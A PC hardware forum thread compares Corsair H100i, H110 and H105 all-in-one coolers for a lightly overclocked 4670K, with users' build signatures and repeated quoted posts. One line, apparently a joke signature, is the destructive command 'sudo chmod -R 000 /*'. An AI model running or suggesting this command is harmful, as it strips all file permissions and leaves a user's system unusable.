Corsair h100i or h110?

Which one is better? I like the look of the waterblock for the h100i but I like the square fans on the h110 because they are more efficient.

The H110 is a 280mm radiator, but the H100i is 240mm, so the H110 is obviously better. 

H105 is the one I would recommend though xD 

Why the h105? It doesn't look that good to me, it still has round fans. Linus said that round fans are bad for keeping stuff cool on a radiator because of the gaps.

Get whatever has the biggest rad you can fit around all of your stuff?

Corsair 450D, will it fit an H110?

Why the h105? It doesn't look that good to me, it still has round fans. Linus said that round fans are bad for keeping stuff cool on a radiator because of the gaps.

It performs better due to the higher thickness of the radiator.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Corsair 450D, will it fit an H110?

Yes it'll fit, but are you actually going to overclock?

CPU: i7 3770k@ 4.6Ghz@ 1.23v - GPU: Palit GTX 660ti - MOBO: Asrock Extreme 4 - RAM: Corsair vengeance 8GB 1600Mhz - PSU: OCZ 650watt - STORAGE: 128Gb corsair force GT SSD/ 1TB seagate barracuda 7200rpm

COOLING: NH-U14s/ 3x Noiseblocker blacksilent pros/ Silverstone Air Penetrator/ 2 corsair AF120s

Yes it'll fit, but are you actually going to overclock?

Yeah, probably lightly though. Maybe 4.2 GHz or 4.4 on my 4670k.

Yeah, probably lightly though. Maybe 4.2 GHz or 4.4 on my 4670k.

A h110 is really unnecessary for that you know. You will be fine with something like the 212 evo if you wanna save abit of money.

CPU: i7 3770k@ 4.6Ghz@ 1.23v - GPU: Palit GTX 660ti - MOBO: Asrock Extreme 4 - RAM: Corsair vengeance 8GB 1600Mhz - PSU: OCZ 650watt - STORAGE: 128Gb corsair force GT SSD/ 1TB seagate barracuda 7200rpm

COOLING: NH-U14s/ 3x Noiseblocker blacksilent pros/ Silverstone Air Penetrator/ 2 corsair AF120s

A h110 is really unnecessary for that you know. You will be fine with something like the 212 evo if you wanna save abit of money.

I know but it's kind of just the idea, I want to try water cooling for a change. Plus if it's capable of doing more than that then I might overclock it more.

I know but it's kind of just the idea, I want to try water cooling for a change. Plus if it's capable of doing more than that then I might overclock it more.

Fair enough, I think with a h110 you'll be able to get 4.8ghz

My 4790K stays nice and cool at 4.8GHz on my H110, I would recommend it. 

CPU: i9-13900k MOBO: Asus Strix Z790-E RAM: 64GB GSkill  CPU Cooler: Corsair H170i

GPU: Asus Strix RTX-4090 Case: Fractal Torrent PSU: Corsair HX-1000i Storage: 2TB Samsung 990 Pro

My 4790K stays nice and cool at 4.8GHz on my H110, I would recommend it. 

Thanks! Sound good, I will likely get it then.

H110 is the better one out of those two.  Just make sure it will fit in your case.

Stay away from the H100i.  It has a mounting problem and is not guaranteed to work for you out of the box without modifications.

"I genuinely dislike the promulgation of false information, especially to people who are asking for help selecting new parts."